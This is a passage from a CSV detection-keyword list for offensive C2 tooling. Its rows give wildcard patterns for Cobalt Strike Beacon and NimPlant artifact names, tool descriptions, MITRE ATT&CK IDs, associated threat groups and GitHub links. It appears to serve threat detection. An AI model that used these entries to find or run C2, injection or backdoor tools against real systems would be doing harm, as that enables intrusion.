Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_remote_exploits*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_smb.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Stage_p2_Stuct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_stage_pipe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_stage_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*Beacon_Stage_Struct_p1*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*Beacon_Stage_Struct_p3*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*beacon_stage_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*beacon_stage_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_test.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_top *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon_top_callback*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*BeaconApi.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*beacon-c2-go*","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","36","8","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" +"*BeaconCleanupProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconConsoleWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconGetSpawnTo*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconGetSpawnTo*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*beacongrapher.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*BeaconInjectProcess*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 